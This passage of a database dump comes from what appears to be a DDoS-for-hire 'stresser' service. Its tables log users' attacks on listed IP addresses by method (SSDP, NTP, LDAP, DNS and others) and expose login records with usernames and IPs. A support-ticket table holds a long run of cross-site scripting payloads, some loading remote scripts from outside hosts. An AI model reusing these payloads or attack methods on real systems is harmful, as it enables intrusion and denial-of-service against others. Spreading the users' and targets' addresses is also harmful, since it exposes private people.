298(114, 'txtgleader', '147.135.3.157', 1569255978, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
299(115, 'youregoingdown', '80.220.248.240', 1569262356, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
300(116, 'youregoingdown', '80.220.248.240', 1569267162, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
301(117, 'youregoingdown', '80.220.248.240', 1569272368, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
302(118, 'txtgleader', '147.135.3.157', 1569272484, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36');
303
304-- --------------------------------------------------------
305
306--
307-- Table structure for table `logs`
308--
309
310CREATE TABLE IF NOT EXISTS `logs` (
311 `user` varchar(15) NOT NULL,
312 `ip` varchar(269) NOT NULL COMMENT '69 bottles of beer on the wall',
313 `port` int(11) NOT NULL,
314 `time` int(11) NOT NULL,
315 `method` varchar(10) NOT NULL,
316 `date` int(11) NOT NULL,
317`ID` int(11) NOT NULL,
318 `stopped` varchar(30) NOT NULL,
319 `server_used` varchar(69) DEFAULT NULL
320) ENGINE=MyISAM AUTO_INCREMENT=72 DEFAULT CHARSET=latin1;
321
322--
323-- Dumping data for table `logs`
324--
325
326INSERT INTO `logs` (`user`, `ip`, `port`, `time`, `method`, `date`, `ID`, `stopped`, `server_used`) VALUES
327('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034453, 1, 'No', 'Server_1'),
328('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034517, 2, 'No', 'Server_1'),
329('deonteworthen', '46.105.37.199', 443, 666, 'SSDP', 1569034556, 3, 'No', 'Server_1'),
330('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034762, 4, 'No', 'Server_1'),
331('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034808, 5, 'No', 'Server_1'),
332('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034955, 6, 'No', 'Server_1'),
333('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569035057, 7, 'No', 'Server_1'),
334('deonteworthen', '71.114.114.224', 53, 5000, 'STD', 1569035433, 8, 'No', 'Server_1'),
335('deonteworthen', '46.105.37.199', 443, 666, 'SSDP', 1569035892, 9, 'No', 'Server_1'),
336('txtgleader', '69.250.162.29', 80, 70, 'VSE', 1569036204, 10, 'No', 'Server_1'),
337('deonteworthen', '73.0.185.31', 80, 50, 'SSDP', 1569036339, 11, 'No', 'Server_1'),
338('deonteworthen', '73.0.185.31', 80, 50, 'SSDP', 1569036394, 12, 'No', 'Server_1'),
339('deonteworthen', '46.105.37.199', 443, 40, 'ZAP', 1569109330, 13, 'No', 'TXTGSERVER1'),
340('txtgleader', '69.250.162.29', 80, 30, 'DNS', 1569109346, 14, 'No', 'TXTGSERVER1'),
341('deonteworthen', '46.105.37.199', 443, 500, 'OVH', 1569109392, 15, 'No', 'TXTGSERVER1'),
342('txtgleader', '69.250.162.29', 80, 30, 'VSE', 1569109402, 16, 'No', 'TXTGSERVER1'),
343('txtgleader', '69.250.162.29', 80, 30, 'SSDP', 1569109483, 17, 'No', 'TXTGSERVER1'),
344('deonteworthen', '54.36.24.156', 443, 500, 'OVH', 1569109876, 18, 'No', 'TXTGSERVER1'),
345('deonteworthen', '54.36.24.157', 443, 500, 'ZAP', 1569110020, 19, 'No', 'TXTGSERVER1'),
346('deonteworthen', '46.105.37.199', 443, 500, 'OVH', 1569110451, 20, 'No', 'TXTGSERVER1'),
347('CaronModzAll', '68.61.11.235', 80, 30, 'DNS', 1569114408, 21, 'No', 'TXTGSERVER1'),
348('CaronModzAll', '68.61.11.235', 80, 30, 'DNS', 1569114450, 22, 'No', 'TXTGSERVER1'),
349('TxtgH3ADSHOT', '75.0.76.171', 58943, 2000, 'DNS', 1569114964, 23, 'No', 'TXTGSERVER1'),
350('TxtgH3ADSHOT', '144.48.107.141', 62014, 6000, 'OVH', 1569117169, 24, 'No', 'TXTGSERVER1'),
351('deonteworthen', '1.1.1.1', 80, 50, 'OVH', 1569119521, 25, 'No', 'TXTGSERVER1'),
352('deonteworthen', '71.114.114.224', 80, 50, 'BLUESYN', 1569119549, 26, 'No', 'TXTGSERVER1'),
353('deonteworthen', '46.105.37.199', 443, 50, 'ZAP', 1569120615, 27, 'No', 'TXTGSERVER1'),
354('deonteworthen', '46.105.37.199', 443, 60, 'OVH', 1569120732, 28, 'No', 'TXTGSERVER1'),
355('deonteworthen', '46.105.37.199', 443, 60, 'TILERA', 1569120835, 29, 'No', 'TXTGSERVER1'),
356('txtgleader', '104.153.105.239', 80, 30, 'TILERA', 1569120919, 30, 'No', 'TXTGSERVER1'),
357('txtgleader', '104.153.105.239', 80, 30, 'TILERA', 1569124226, 31, 'No', 'TXTGSERVER1'),
358('deonteworthen', '76.107.118.8', 80, 5000, 'ZAP', 1569128428, 32, 'No', 'TXTGSERVER1'),
359('txtgleader', '185.44.76.118', 80, 70, 'TILERA', 1569128593, 33, 'No', 'TXTGSERVER1'),
360('txtgleader', '144.217.208.254', 80, 30, 'TILERA', 1569129950, 34, 'No', 'TXTGSERVER1'),
361('txtgleader', '144.217.208.254', 1995, 30, 'ZAP', 1569130077, 35, 'No', 'TXTGSERVER1'),
362('txtgleader', '144.217.208.254', 80, 30, 'TILERA', 1569130134, 36, 'No', 'TXTGSERVER1'),
363('txtgleader', '144.217.208.254', 1995, 30, 'TILERA', 1569130187, 37, 'No', 'TXTGSERVER1'),
364('deonteworthen', '108.73.111.98', 80, 500, 'ACK', 1569171438, 38, 'No', 'TXTGSERVER1'),
365('txtgleader', '184.26.98.101', 80, 30, 'ZAP', 1569191254, 39, 'No', 'TXTGSERVER1'),
366('txtgleader', '184.26.98.101', 80, 30, 'TILERA', 1569191315, 40, 'No', 'TXTGSERVER1'),
367('txtgleader', '147.135.3.157', 80, 20, 'TILERA', 1569195487, 41, 'No', 'TXTGSERVER1'),
368('Frosty', '107.181.166.97', 80, 60, 'LDAP', 1569198236, 42, 'No', 'TXTGSERVER1'),
369('Frosty', '189.203.187.110', 39492, 60, 'NTP', 1569198471, 43, 'No', 'TXTGSERVER1'),
370('Frosty', '174.17.91.137', 80, 60, 'LDAP', 1569198564, 44, 'No', 'TXTGSERVER1'),
371('Frosty', '170.82.26.181', 80, 60, 'LDAP', 1569198873, 45, 'No', 'TXTGSERVER1'),
372('Frosty', '89.39.107.194', 61514, 60, 'DNS', 1569198926, 46, 'No', 'TXTGSERVER1'),
373('Frosty', '89.39.107.194', 61514, 60, 'UBNT', 1569199004, 47, 'No', 'TXTGSERVER1'),
374('Frosty', '166.182.250.155', 22896, 60, 'DNS', 1569199538, 48, 'No', 'TXTGSERVER1'),
375('Frosty', '126.224.135.232', 80, 35, 'DNS', 1569199619, 49, 'No', 'TXTGSERVER1'),
376('Frosty', '70.33.128.223', 80, 60, 'LDAP', 1569199692, 50, 'No', 'TXTGSERVER1'),
377('Frosty', '51.79.52.211', 80, 60, 'OVH', 1569203699, 51, 'No', 'TXTGSERVER1'),
378('Frosty', '51.79.52.211', 443, 60, 'TILERA', 1569203772, 52, 'No', 'TXTGSERVER1'),
379('Frosty', '51.79.52.211', 443, 60, 'OVH', 1569203837, 53, 'No', 'TXTGSERVER1'),
380('Frosty', '51.79.52.211', 22, 60, 'OVH', 1569204020, 54, 'No', 'TXTGSERVER1'),
381('Frosty', '51.79.52.211', 22, 60, 'VSE', 1569204237, 55, 'No', 'TXTGSERVER1'),
382('deonteworthen', '147.135.3.157', 443, 500, 'OVH', 1569207909, 56, 'No', 'TXTGSERVER1'),
383('deonteworthen', '46.105.37.199', 443, 500, 'OVH', 1569208195, 57, 'No', 'TXTGSERVER1'),
384('txtgleader', '147.135.117.196', 80, 30, 'TILERA', 1569215974, 58, 'No', '2Servers'),
385('txtgleader', '147.135.117.196', 80, 30, 'SSDP', 1569216035, 59, 'No', '2Servers'),
386('treyyoung', '68.40.178.45', 3658, 100, 'ZAP', 1569216047, 60, 'No', '2Servers'),
387('txtgleader', '147.135.117.196', 80, 30, 'NTP', 1569216090, 61, 'No', '2Servers'),
388('txtgleader', '147.135.117.196', 80, 30, 'VSE', 1569216151, 62, 'No', '2Servers'),
389('treyyoung', '68.40.178.45', 3658, 9000, 'ZAP', 1569216175, 63, 'No', '2Servers'),
390('txtgleader', '147.135.117.196', 992, 30, 'TILERA', 1569216206, 64, 'No', '2Servers'),
391('txtgleader', '147.135.117.196', 992, 20, 'OVH', 1569216281, 65, 'No', '2Servers'),
392('CaronModzAll', '68.61.11.235', 80, 60, 'LDAP', 1569218356, 66, 'No', '2Servers'),
393('treyyoung', '92.114.82.247', 41851, 9000, 'DNS', 1569218508, 67, 'No', '2Servers'),
394('txtgleader', '73.2.41.14', 80, 30, 'TILERA', 1569250988, 68, 'No', '2Servers'),
395('txtgleader', '68.119.49.115', 80, 300, 'VSE', 1569252187, 69, 'No', '2Servers'),
396('txtgleader', '68.119.49.15', 80, 300, 'VSE', 1569252224, 70, 'No', '2Servers'),
397('txtgleader', '186.96.211.34', 4074, 300, 'LDAP', 1569258373, 71, 'No', '2Servers');
398
399-- --------------------------------------------------------
400
401--
402-- Table structure for table `messages`
403--
404
405CREATE TABLE IF NOT EXISTS `messages` (
406`messageid` int(11) NOT NULL,
407 `ticketid` int(11) NOT NULL,
408 `content` text NOT NULL,
409 `sender` varchar(30) NOT NULL,
410 `date` int(16) DEFAULT NULL
411) ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=latin1;
412
413--
414-- Dumping data for table `messages`
415--
416
417INSERT INTO `messages` (`messageid`, `ticketid`, `content`, `sender`, `date`) VALUES
418(2, 4, 'TEST', 'txtgleader', 1569033145),
419(3, 5, 'TEST', 'txtgleader', 1569033168),
420(4, 6, 'extra message', 'iamtesting', 1569053281),
421(5, 6, '"><script>confirm("xss")</script>', 'iamtesting', 1569053929),
422(6, 6, '"><script>confirm("xss")</script>', 'iamtesting', 1569053947),
423(7, 7, 'pillshere', 'iamtesting', 1569055225),
424(8, 7, 'pillshere', 'iamtesting', 1569055437),
425(9, 7, 'alert`1`', 'iamtesting', 1569055437),
426(10, 7, 'alert(1)', 'iamtesting', 1569055437),
427(11, 7, 'alert(1)', 'iamtesting', 1569055437),
428(12, 7, '(alert)(1)', 'iamtesting', 1569055437),
429(13, 7, 'alert(1)', 'iamtesting', 1569055437),
430(14, 7, '[1].find(alert)', 'iamtesting', 1569055438),
431(15, 7, 'top["al"+"ert"](1)', 'iamtesting', 1569055438),
432(16, 7, 'top[/al/.source+/ert/.source](1)', 'iamtesting', 1569055439),
433(17, 7, 'a=alert,a(1)', 'iamtesting', 1569055439),
434(18, 7, 'al\\u0065rt(1)', 'iamtesting', 1569055439),
435(19, 7, 'top[''al\\145rt''](1)', 'iamtesting', 1569055439),
436(20, 7, 'top[''al\\x65rt''](1)', 'iamtesting', 1569055440),
437(21, 7, 'top[8680439..toString(30)](1)', 'iamtesting', 1569055440),
438(22, 7, 'navigator.vibrate(500)', 'iamtesting', 1569055440),
439(23, 7, 'eval(location.hash.slice(1)>#alert(1)', 'iamtesting', 1569055440),
440(24, 7, 'eval(URL.slice(-8))>#alert(1)', 'iamtesting', 1569055440),
441(25, 7, 'innerHTML=location.hash>#<script>alert(1)</script>', 'iamtesting', 1569055441),
442(26, 7, '<svg onload=alert(1)>', 'iamtesting', 1569055441),
443(27, 7, '"onmouseover=alert(1)//', 'iamtesting', 1569055441),
444(28, 7, '"><svg onload=alert(1)//', 'iamtesting', 1569055441),
445(29, 7, '''-alert(1)//', 'iamtesting', 1569055441),
446(30, 7, '"autofocus/onfocus=alert(1)//', 'iamtesting', 1569055441),
447(31, 7, '''-alert(1)-''', 'iamtesting', 1569055441),
448(32, 7, '\\''-alert(1)//', 'iamtesting', 1569055441),
449(33, 7, '</script><svg onload=alert(1)>', 'iamtesting', 1569055441),
450(34, 7, '<x contenteditable onblur=alert(1)>lose focus!', 'iamtesting', 1569055441),
451(35, 7, '<x onclick=alert(1)>click this!', 'iamtesting', 1569055442),
452(36, 7, '<x oncopy=alert(1)>copy this!', 'iamtesting', 1569055442),
453(37, 7, '<x oncontextmenu=alert(1)>right click this!', 'iamtesting', 1569055442),
454(38, 7, '<x oncut=alert(1)>copy this!', 'iamtesting', 1569055442),
455(39, 7, '<x ondblclick=alert(1)>double click this!', 'iamtesting', 1569055442),
456(40, 7, '<x contenteditable onfocus=alert(1)>focus this!', 'iamtesting', 1569055442),
457(41, 7, '<x contenteditable oninput=alert(1)>input here!', 'iamtesting', 1569055442),
458(42, 7, '<x ondrag=alert(1)>drag this!', 'iamtesting', 1569055442),
459(43, 7, '<x contenteditable onkeydown=alert(1)>press any key!', 'iamtesting', 1569055442),
460(44, 7, '<x contenteditable onkeypress=alert(1)>press any key!', 'iamtesting', 1569055442),
461(45, 7, '<x onmousedown=alert(1)>click this!', 'iamtesting', 1569055442),
462(46, 7, '<x contenteditable onkeyup=alert(1)>press any key!', 'iamtesting', 1569055442),
463(47, 7, '<x onmousemove=alert(1)>hover this!', 'iamtesting', 1569055442),
464(48, 7, '<x onmouseout=alert(1)>hover this!', 'iamtesting', 1569055442),
465(49, 7, '<x onmouseup=alert(1)>click this!', 'iamtesting', 1569055442),
466(50, 7, '<x onmouseover=alert(1)>hover this!', 'iamtesting', 1569055442),
467(51, 7, '<x contenteditable onpaste=alert(1)>paste here!', 'iamtesting', 1569055442),
468(52, 7, '<script>alert(1)//', 'iamtesting', 1569055442),
469(53, 7, '<x onxxx=alert(1)', 'iamtesting', 1569055442),
470(54, 7, '<x onxxx=1', 'iamtesting', 1569055443),
471(55, 7, '<xonxxx=1', 'iamtesting', 1569055443),
472(56, 7, '<x/onxxx=1', 'iamtesting', 1569055443),
473(57, 7, '<x\ronxxx=1', 'iamtesting', 1569055443),
474(58, 7, 'pillshere', 'iamtesting', 1569055565),
475(59, 7, 'alert`1`', 'iamtesting', 1569055565),
476(60, 7, 'alert(1)', 'iamtesting', 1569055565),
477(61, 7, 'alert(1)', 'iamtesting', 1569055565),
478(62, 7, 'alert(1)', 'iamtesting', 1569055565),
479(63, 7, '<x contenteditable onkeydown=alert(1)>press any key!', 'iamtesting', 1569055565),
480(64, 7, '(alert)(1)', 'iamtesting', 1569055566),
481(65, 7, '<x onxxx=alert(1) 1=''', 'iamtesting', 1569055566),
482(66, 7, '*/</script>''>alert(1)/*<script/1=''', 'iamtesting', 1569055566),
483(67, 7, '<script>alert(1)</script>', 'iamtesting', 1569055566),
484(68, 7, '<embed src=javascript:alert(1)>', 'iamtesting', 1569055566),
485(69, 7, '<form action=javascript:alert(1)><input type=submit>', 'iamtesting', 1569055566),
486(70, 7, '<body onorientationchange=alert(1)>', 'iamtesting', 1569055566),
487(71, 7, 'GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;', 'iamtesting', 1569055566),
488(72, 7, '<body onpageshow=alert(1)>', 'iamtesting', 1569055566),
489(73, 7, 'a=alert,a(1)', 'iamtesting', 1569055567),
490(74, 7, '[1].find(alert)', 'iamtesting', 1569055567),
491(75, 7, 'top["al"+"ert"](1)', 'iamtesting', 1569055568),
492(76, 7, 'top[/al/.source+/ert/.source](1)', 'iamtesting', 1569055568),
493(77, 7, 'al\\u0065rt(1)', 'iamtesting', 1569055568),
494(78, 7, 'top[''al\\145rt''](1)', 'iamtesting', 1569055568),
495(79, 7, 'top[''al\\x65rt''](1)', 'iamtesting', 1569055569),
496(80, 7, 'top[8680439..toString(30)](1)', 'iamtesting', 1569055569),
497(81, 7, 'navigator.vibrate(500)', 'iamtesting', 1569055569),
498(82, 7, 'eval(location.hash.slice(1)>#alert(1)', 'iamtesting', 1569055569),
499(83, 7, 'eval(URL.slice(-8))>#alert(1)', 'iamtesting', 1569055569),
500(84, 7, '<svg onload=alert(1)>', 'iamtesting', 1569055569),
501(85, 7, 'innerHTML=location.hash>#<script>alert(1)</script>', 'iamtesting', 1569055569),
502(86, 7, '"onmouseover=alert(1)//', 'iamtesting', 1569055569),
503(87, 7, '<script>alert(''XSS'')</script>', 'iamtesting', 1569055569),
504(88, 7, '"><svg onload=alert(1)//', 'iamtesting', 1569055570),
505(89, 7, '"autofocus/onfocus=alert(1)//', 'iamtesting', 1569055570),
506(90, 7, '''-alert(1)//', 'iamtesting', 1569055570),
507(91, 7, '''-alert(1)-''', 'iamtesting', 1569055570),
508(92, 7, '\\''-alert(1)//', 'iamtesting', 1569055570),
509(93, 7, '</script><svg onload=alert(1)>', 'iamtesting', 1569055570),
510(94, 7, '<x onclick=alert(1)>click this!', 'iamtesting', 1569055570),
511(95, 7, '<x contenteditable onkeypress=alert(1)>press any key!', 'iamtesting', 1569055570),
512(96, 7, '<x oncut=alert(1)>copy this!', 'iamtesting', 1569055570),
513(97, 7, '<x oncontextmenu=alert(1)>right click this!', 'iamtesting', 1569055570),
514(98, 7, '<x ondrag=alert(1)>drag this!', 'iamtesting', 1569055570),
515(99, 7, '<x ondblclick=alert(1)>double click this!', 'iamtesting', 1569055570),
516(100, 7, '<x contenteditable onfocus=alert(1)>focus this!', 'iamtesting', 1569055570),
517(101, 7, '<x contenteditable oninput=alert(1)>input here!', 'iamtesting', 1569055570),
518(102, 7, '<x oncopy=alert(1)>copy this!', 'iamtesting', 1569055570),
519(103, 7, '<x contenteditable onblur=alert(1)>lose focus!', 'iamtesting', 1569055570),
520(104, 7, '<x contenteditable onkeyup=alert(1)>press any key!', 'iamtesting', 1569055570),
521(105, 7, '"><img src=x onerror=alert(String.fromCharCode(88,83,83));>', 'iamtesting', 1569055570),
522(106, 7, '<x onmousedown=alert(1)>click this!', 'iamtesting', 1569055570),
523(107, 7, '<x onmouseout=alert(1)>hover this!', 'iamtesting', 1569055571),
524(108, 7, '<x onmousemove=alert(1)>hover this!', 'iamtesting', 1569055571),
525(109, 7, '<x onmouseup=alert(1)>click this!', 'iamtesting', 1569055571),
526(110, 7, '<script>alert(1)//', 'iamtesting', 1569055571),
527(111, 7, '<script>alert(1)<!–', 'iamtesting', 1569055571),
528(112, 7, '<x onmouseover=alert(1)>hover this!', 'iamtesting', 1569055571),
529(113, 7, '<x onxxx=alert(1)', 'iamtesting', 1569055571),
530(114, 7, '<script src=//brutelogic.com.br/1.js>', 'iamtesting', 1569055571),
531(115, 7, '<X OnXxx=1', 'iamtesting', 1569055571),
532(116, 7, '<x contenteditable onpaste=alert(1)>paste here!', 'iamtesting', 1569055571),
533(117, 7, '<script src=//3334957647/1>', 'iamtesting', 1569055571),
534(118, 7, '<x onxxx=1', 'iamtesting', 1569055571),
535(119, 7, '<X onxxx=1', 'iamtesting', 1569055571),
536(120, 7, '<x onxxx=1', 'iamtesting', 1569055571),
537(121, 7, '<x onxxx=1', 'iamtesting', 1569055571),
538(122, 7, '<x/onxxx=1', 'iamtesting', 1569055571),
539(123, 7, '<x onxxx=1', 'iamtesting', 1569055571),
540(124, 7, '<x OnXxx=1', 'iamtesting', 1569055571),
541(125, 7, '<x onxxx=1', 'iamtesting', 1569055571),
542(126, 7, '<x 1="1"onxxx=1', 'iamtesting', 1569055571),
543(127, 7, '<http://onxxx=1/', 'iamtesting', 1569055571),
544(128, 7, '<x 1=''1''onxxx=1', 'iamtesting', 1569055571),
545(129, 7, '<x 1=">" onxxx=1', 'iamtesting', 1569055571),
546(130, 7, '<x\ronxxx=1', 'iamtesting', 1569055571),
547(131, 7, '<x/onxxx=1', 'iamtesting', 1569055571),
548(132, 7, '<x </onxxx=1', 'iamtesting', 1569055571),
549(133, 7, '<x onxxx=1 onxxx=1', 'iamtesting', 1569055571),
550(134, 7, '<x onxxx=1', 'iamtesting', 1569055571),
551(135, 7, '<xonxxx=1', 'iamtesting', 1569055571),
552(136, 7, '''onload=alert(1)><svg/1=''', 'iamtesting', 1569055571),
553(137, 7, '<x\nonxxx=1', 'iamtesting', 1569055571),
554(138, 7, '''>alert(1)</script><script/1=''', 'iamtesting', 1569055571),
555(139, 7, '*/alert(1)</script><script>/*', 'iamtesting', 1569055571),
556(140, 7, '<svg onload=setInterval(function(){with(document)body.appendChild(createElement(''script'')).src=''//HOST:PORT''},0)>', 'iamtesting', 1569055571),
557(141, 7, '`-alert(1)">''onload="`<svg/1=''', 'iamtesting', 1569055571),
558(142, 7, '*/alert(1)">''onload="/*<svg/1=''', 'iamtesting', 1569055572),
559(143, 7, '<script src=javascript:alert(1)>', 'iamtesting', 1569055572),
560(144, 7, '<a href=javascript:alert(1)>click', 'iamtesting', 1569055572),
561(145, 7, '<math><brute href=javascript:alert(1)>click', 'iamtesting', 1569055572),
562(146, 7, '<html ontouchmove=alert(1)>', 'iamtesting', 1569055572),
563(147, 7, '<math><brute xlink:href=javascript:alert(1)>click', 'iamtesting', 1569055572),
564(148, 7, '<iframe src=javascript:alert(1)>', 'iamtesting', 1569055572),
565(149, 7, '"><img src=1 onerror=alert(1)>.gif', 'iamtesting', 1569055572),
566(150, 7, '<form><input formaction=javascript:alert(1) type=image value=click>', 'iamtesting', 1569055572),
567(151, 7, '<form><button formaction=javascript:alert(1)>click', 'iamtesting', 1569055572),
568(152, 7, '<isindex action=javascript:alert(1) type=submit value=click>', 'iamtesting', 1569055572),
569(153, 7, '<iframe srcdoc=<svg/onload=alert(1)>>', 'iamtesting', 1569055572),
570(154, 7, '<form><input formaction=javascript:alert(1) type=submit value=click>', 'iamtesting', 1569055572),
571(155, 7, '<form><input formaction=javascript:alert(1) type=image src=SOURCE>', 'iamtesting', 1569055572),
572(156, 7, '<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>', 'iamtesting', 1569055572),
573(157, 7, '<html ontouchcancel=alert(1)>', 'iamtesting', 1569055572),
574(158, 7, '<html ontouchend=alert(1)>', 'iamtesting', 1569055572),
575(159, 7, '<isindex formaction=javascript:alert(1) type=submit value=click>', 'iamtesting', 1569055572),
576(160, 7, '<html ontouchstart=alert(1)>', 'iamtesting', 1569055572),
577(161, 7, '<svg><script xlink:href=data:,alert(1) />', 'iamtesting', 1569055572),
578(162, 7, '<object data=javascript:alert(1)>', 'iamtesting', 1569055572),
579(163, 7, '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>', 'iamtesting', 1569055572),
580(164, 7, '"><script src=data:,alert(1)//', 'iamtesting', 1569055572),
581(165, 7, '"><script src=//brutelogic.com.br/1.js#', 'iamtesting', 1569055572),
582(166, 7, '<script src="data:,alert(1)//', 'iamtesting', 1569055572),
583(167, 7, '<script src="//brutelogic.com.br/1.js#', 'iamtesting', 1569055572),
584(168, 7, '<link rel=import href="data:text/html,<script>alert(1)</script>', 'iamtesting', 1569055572),
585(169, 7, '<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)', 'iamtesting', 1569055572),
586(170, 7, '"><link rel=import href=data:text/html,<script>alert(1)</script>', 'iamtesting', 1569055572),
587(171, 7, '<base href=//0>', 'iamtesting', 1569055572),
588(172, 7, '<body onload=alert(1)>', 'iamtesting', 1569055572),
589(173, 7, '<body onhashchange=alert(1)><a href=#x>click this!#x', 'iamtesting', 1569055572),
590(174, 7, '<body onscroll=alert(1)><br><br><br><br>', 'iamtesting', 1569055572),
591(175, 7, '<body onfocus=alert(1)>', 'iamtesting', 1569055572),
592(176, 7, '<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x', 'iamtesting', 1569055573),
593(177, 7, '<body onresize=alert(1)>press F12!', 'iamtesting', 1569055573),
594(178, 7, '<marquee onstart=alert(1)>', 'iamtesting', 1569055573),
595(179, 7, '<audio src onloadstart=alert(1)>', 'iamtesting', 1569055573),
596(180, 7, '<marquee loop=1 width=0 onfinish=alert(1)>', 'iamtesting', 1569055573),
597(181, 7, '<body onhelp=alert(1)>press F1! (MSIE)', 'iamtesting', 1569055573),
598(182, 7, '<video onloadstart=alert(1)><source>', 'iamtesting', 1569055573),
599(183, 7, '<input autofocus onblur=alert(1)>', 'iamtesting', 1569055573),
600(184, 7, '<scr<script>ipt>alert(''XSS'')</scr<script>ipt>', 'iamtesting', 1569055573),
601(185, 7, '<menu id=x contextmenu=x onshow=alert(1)>right click me!', 'iamtesting', 1569055573),
602(186, 7, '<keygen autofocus onfocus=alert(1)>', 'iamtesting', 1569055573),
603(187, 7, '<form onsubmit=alert(1)><input type=submit>', 'iamtesting', 1569055573),
604(188, 7, '<select onchange=alert(1)><option>1<option>2', 'iamtesting', 1569055573),
605(189, 7, 'pillshere', 'iamtesting', 1569055643),
606(190, 7, ''';alert(String.fromCharCode(88,83,83))//\\'';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode<script>alert(''xss'')</script>', 'iamtesting', 1569055643),
607(191, 7, ''''';!--"<XSS>=&{()}', 'iamtesting', 1569055643),
608(192, 7, '//--></SCRIPT>">''><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>', 'iamtesting', 1569055643),
609(193, 7, '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>', 'iamtesting', 1569055643),
610(194, 7, '<IMG SRC="javascript:alert(''XSS'');">', 'iamtesting', 1569055643),
611(195, 7, '<IMG SRC=javascript:alert(''XSS'')>', 'iamtesting', 1569055643),
612(196, 7, '<IMG SRC="  javascript:alert(''XSS'');">', 'iamtesting', 1569055643),
613(197, 7, '<IMG SRC=javascrscriptipt:alert(''XSS'')>', 'iamtesting', 1569055643),
614(198, 7, '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 'iamtesting', 1569055643),
615(199, 7, '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', 'iamtesting', 1569055643),
616(200, 7, '<IMG SRC=JaVaScRiPt:alert(''XSS'')>', 'iamtesting', 1569055643),
617(201, 7, '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 'iamtesting', 1569055643),
618(202, 7, '<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>', 'iamtesting', 1569055643),
619(203, 7, '<<SCRIPT>alert("XSS");//<</SCRIPT>', 'iamtesting', 1569055643),
620(204, 7, '\\";alert(''XSS'');//', 'iamtesting', 1569055643),
621(205, 7, '<TABLE><TD BACKGROUND="javascript:alert(''XSS'')">', 'iamtesting', 1569055643),
622(206, 7, '</TITLE><SCRIPT>alert("XSS");</SCRIPT>', 'iamtesting', 1569055643),
623(207, 7, '<DIV STYLE="width: expression(alert(''XSS''));">', 'iamtesting', 1569055643),
624(208, 7, '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028''\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029''\\0029">', 'iamtesting', 1569055643),
625(209, 7, '<DIV STYLE="background-image: url(javascript:alert(''XSS''))">', 'iamtesting', 1569055643),
626(210, 8, 'javascript:confirm()', 'iamtesting', 1569060755);
627
628-- --------------------------------------------------------
629
630--
631-- Table structure for table `news`
632--
633
634CREATE TABLE IF NOT EXISTS `news` (
635`ID` int(11) NOT NULL,
636 `title` varchar(50) NOT NULL,
637 `author_id` int(11) NOT NULL,
638 `detail` text NOT NULL,
639 `date` int(11) NOT NULL
640) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
641
642--
643-- Dumping data for table `news`
644--
645
646INSERT INTO `news` (`ID`, `title`, `author_id`, `detail`, `date`) VALUES
647(1, 'Welcome To TXTG-STRESSER', 1, 'Enjoy Ur Spot On My Stresser', 1569036641);
648
649-- --------------------------------------------------------
650
651--
652-- Table structure for table `payments`
653--
654
655CREATE TABLE IF NOT EXISTS `payments` (
656`ID` int(11) NOT NULL,
657 `paid` float NOT NULL,
658 `plan` int(11) NOT NULL,
659 `user` int(15) NOT NULL,
660 `email` varchar(60) DEFAULT NULL,
661 `btc_addr` varchar(69) DEFAULT NULL,
662 `type` enum('btc','stripe','pp','') DEFAULT NULL,
663 `tid` varchar(30) NOT NULL,
664 `date` int(255) NOT NULL
665) ENGINE=MyISAM DEFAULT CHARSET=latin1;
666
667-- --------------------------------------------------------
668
669--
670-- Table structure for table `ping_tokens`
671--
672
673CREATE TABLE IF NOT EXISTS `ping_tokens` (
674`pt_id` int(11) NOT NULL,
675 `token` varchar(36) NOT NULL,
676 `user_id` int(11) NOT NULL,
677 `attack_id` int(11) NOT NULL,
678 `date` int(16) NOT NULL,
679 `runs` int(2) NOT NULL DEFAULT '1'
680) ENGINE=MyISAM AUTO_INCREMENT=72 DEFAULT CHARSET=latin1;
681
682--
683-- Dumping data for table `ping_tokens`
684--
685
686INSERT INTO `ping_tokens` (`pt_id`, `token`, `user_id`, `attack_id`, `date`, `runs`) VALUES
687(1, '7ec54a8cee98cb7a2ddd73296c5df318', 2, 1, 1569034453, 1),
688(2, '70fb9b68d531ec59937215ab2b2fea68', 2, 2, 1569034517, 1),
689(3, '8375f2b7ab5baee37e966f630313ee5a', 4, 3, 1569034556, 1),
690(4, '2cee96f6e2dc39e26b8243b9299e062f', 2, 4, 1569034762, 1),
691(5, '90cb32d8edbfb3d5f79e9acf8fcd79c1', 2, 5, 1569034808, 1),
692(6, '4fc5de2b592d4ba0e8bbc4098144ad63', 2, 6, 1569034955, 1),
